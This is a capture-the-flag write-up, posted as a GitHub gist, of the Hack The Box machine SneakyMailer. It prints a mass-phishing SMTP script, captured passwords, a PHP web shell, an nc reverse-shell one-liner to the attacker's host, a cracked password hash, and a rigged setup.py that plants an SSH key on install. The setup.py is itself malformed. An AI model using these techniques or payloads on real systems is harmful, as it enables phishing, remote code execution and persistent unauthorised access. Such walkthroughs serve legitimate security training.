Skip to content

Instantly share code, notes, and snippets.

@3rg1s

3rg1s/sneakymailer.md

Created September 14, 2020 13:09
Show Gist options
  • Save 3rg1s/22afc88e3343ea52c020b6525cb8312c to your computer and use it in GitHub Desktop.
Save 3rg1s/22afc88e3343ea52c020b6525cb8312c to your computer and use it in GitHub Desktop.
Download ZIP
Raw
sneakymailer.md

Hello fellow hackers,

From nmap scan I have 7 open ports.

# Nmap 7.80 scan initiated Wed Sep  9 05:06:25 2020 as: nmap -sC -sV -oN initial 10.10.10.197
Nmap scan report for 10.10.10.197
Host is up (0.078s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      vsftpd 3.0.3
22/tcp   open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 57:c9:00:35:36:56:e6:6f:f6:de:86:40:b2:ee:3e:fd (RSA)
|   256 d8:21:23:28:1d:b8:30:46:e2:67:2d:59:65:f0:0a:05 (ECDSA)
|_  256 5e:4f:23:4e:d4:90:8e:e9:5e:89:74:b3:19:0c:fc:1a (ED25519)
25/tcp   open  smtp     Postfix smtpd
|_smtp-commands: debian, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING, 
80/tcp   open  http     nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Did not follow redirect to http://sneakycorp.htb
143/tcp  open  imap     Courier Imapd (released 2018)
|_imap-capabilities: ACL2=UNION CHILDREN SORT THREAD=REFERENCES NAMESPACE UIDPLUS CAPABILITY OK UTF8=ACCEPTA0001 IMAP4rev1 THREAD=ORDEREDSUBJECT completed QUOTA IDLE ENABLE STARTTLS ACL
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-05-14T17:14:21
|_Not valid after:  2021-05-14T17:14:21
|_ssl-date: TLS randomness does not represent time
993/tcp  open  ssl/imap Courier Imapd (released 2018)
|_imap-capabilities: ACL2=UNION CHILDREN SORT THREAD=REFERENCES AUTH=PLAIN UIDPLUS CAPABILITY OK UTF8=ACCEPTA0001 IMAP4rev1 THREAD=ORDEREDSUBJECT completed QUOTA NAMESPACE ENABLE IDLE ACL
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-05-14T17:14:21
|_Not valid after:  2021-05-14T17:14:21
|_ssl-date: TLS randomness does not represent time
8080/tcp open  http     nginx 1.14.2
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: nginx/1.14.2
|_http-title: Welcome to nginx!
Service Info: Host:  debian; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Sep  9 05:07:08 2020 -- 1 IP address (1 host up) scanned in 43.31 seconds

Port 80

As always first I go to port 80, visiting this website I have a dashboard but I can't do much with it. I go to team.php and I can see the list of all employees of the company. directory brute force also didn't give me anything. Looking at nmap again we have smtp open at port 25.

Port 25

Smtp or Simple mail transfer protocol is a protocol which handles the email transfer. So this protocol can be used to send emails. imap on the other hand is used to receive the email. Having smtp open at port 25 we can use telnet and try to send emails to the previously emails we found at team.php.

kali@kali:~/Desktop/SneakyMailer/nmap$ telnet 10.10.10.197 25
Trying 10.10.10.197...
Connected to 10.10.10.197.
Escape character is '^]'.
220 debian ESMTP Postfix (Debian/GNU)
MAIL FROM: anything@htb.com
250 2.1.0 Ok
RCPT TO: someemail@htb.com
454 4.7.1 <someemail@htb.com>: Relay access denied
RCPT TO:airisatou@sneakymailer.htb
250 2.1.5 Ok
DATA
354 End data with <CR><LF>.<CR><LF>
hello there friend.
.
250 2.0.0 Ok: queued as 5A0B024689

So we successfully send an email to one of the email addresses found on the team.php. Maybe we can send a link and see if someone from these emails clicks it. But first of all we need to get all email addresses from team.php. You can do that by using cewl. cewl -n -e --email_file mailid.txt http://sneakycorp.htb this will output a file mailid.txt with all the email addresses. And then to automate the whole process of sending an email to each email address I created a python script. I will also setup a listener on my machine.

#!/usr/bin/python

import smtplib
smtpObj = smtplib.SMTP('10.10.10.197')
sender = 'fuxsocy@htb.com'
message = "Check this out http://10.10.14.188"


with open("../email/mailid.txt") as mails:
  emails = [line.strip() for line in mails.read().split("\n") if line]
  for i in emails:
      smtpObj.sendmail(sender, i, message)         
      print("Successfully sent email")

emailsent

A user clicked send us these parameters. I am going to decode this because this is url encoded.

firstName=Paul&lastName=Byrd&email=paulbyrd@sneakymailer.htb&password=^(#J@SkFv2[%KhIxKk(JuhqcHl<:Ht&rpassword=^(#J@SkFv2[%KhIxKk(JuhqcHl<:Ht

I have the password of an email address now. I tried to use this on the ssh port, but failed to do so. I also tried to use this on ftp but also failed.

But as this is an email address I can use this one in the imap server to authenticate. I download evolution which is an email client and then login as paulbyrd and the password found.

Inside the send email folder. One email has credentials inside of it.

Hello administrator, I want to change this password for the developer account

Username: developer

Original-Password: m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C

Please notify me when you do it

I then use this password against ftp. and successfully logged in. I also have the permission to upload files to the server inside /dev/ folder. I create a simple php shell script, and upload it, using put command.

<?php
echo exec($_GET['fuxsocy']);
?>

But I wasn't able to find the script on the web app on port 80. So maybe it is hidden into another folder, but that wasn't the case. I did a little subdomain discovery using wfuzz and found another sub.domain. dev This finds another subdomain, called dev. I edit /etc/hosts files and include that subdomain. Upon visiting that subdomain I try to gain rce with the file i previously uploaded via ftp.

rce At this moment I try to get back a reverse shell to me. By running this file but url-encoded

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $IPHERE 8989 >/tmp/f

Looking inside /var/www we have 3 folders 2 of them belong to different subdomains and 1 is /html, I try to explore pypi.sneakycorp.htb as this is new to me. Inside of it is a .htpasswd file, containg a hash along with a username.

pypi:$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/

Looking at hashcat hashing examples the hash is mode 1600 , I use rockyou.txt and find the password soufianeelhaoui for the pypi server.

About pypi server

Pypiserver is a repo of all the python packages you want to fetch with pip. You can also create your own and store your own packages there. We have the password and the username so we can use both of these to upload our own packages at the server. Reading this post from linode I get a understanding on what should I do in order to upload my own package on the server. Let's break it down one by one create one:

Our directory structure should look like this, where package_htb is our package name.

package_htb/
    package_htb/
        __init__.py
    setup.py
    setup.cfg

I create these inside /dev/shm/ you can also use /tmp/ or any directory with write access to.

__init__.py :

def hello_word():
    print("hello world")

Inside this file we can execute our own code as long as the package goes to the server, enumerating I found a user in which I can read authorized_keys but I cannot write so I will create a ssh key-pair in my local machine and then write the public key to the user low on the machine. ssh-keygen -t ed25519 I am using ed25519 because the ouput of the pub key is short and I wont mess the python code with new lines etc.

setup.py :

from setuptools import setup

 
try:
with  open("/home/low/.ssh/authorized_keys", 'w') as f:
	f.write("ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEBu9PghaYMY4ap+f/M7Z2LnkRyaYEIH7EphN6xV2Zug kali@kali")

  

except:

setup(

name = 'package_htb',

packages = ['package_htb'],

description = 'Hello world enterprise edition',

version = '0.1',

url = 'http://pypi.sneakycorp.htb/package_htb',

author = 'package_htb',

author_email = 'fuxsocy@sneaky.com',

keywords = ['pip', 'gis', 'example']

)

setup.cfg:

[metadata]
description-file = README.md

To upload this package on the server we need to create another file containing the password we found.

.pypirc:

[distutils]
index-servers =
pypi
package_htb
[pypi]
username:
password:
[package_htb]
repository: http://127.0.0.1:5000
username: pypi
password: soufianeelhaoui

The server port was found using netstat and then I used wget to verify it was that port.

Now we need to compress the package python3 setup.py sdist

Set Home directory to current path $export HOME=/dev/shm/package_htb

Upload the package to server python3 setup.py sdist upload -r package_htb

Now our ssh pub key was written to low user profile so we can access low user with ssh protocol.

Getting root via pip3

User low can run pip3 as sudo without a password.

privesc

Visiting gtfobins we can use that to gain root access on the system.

Exploring how some things work

We can find some scripts inside /opt directory which automate the email click and the ftp file delete. Looking at those scripts we can learn more about php and python3.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment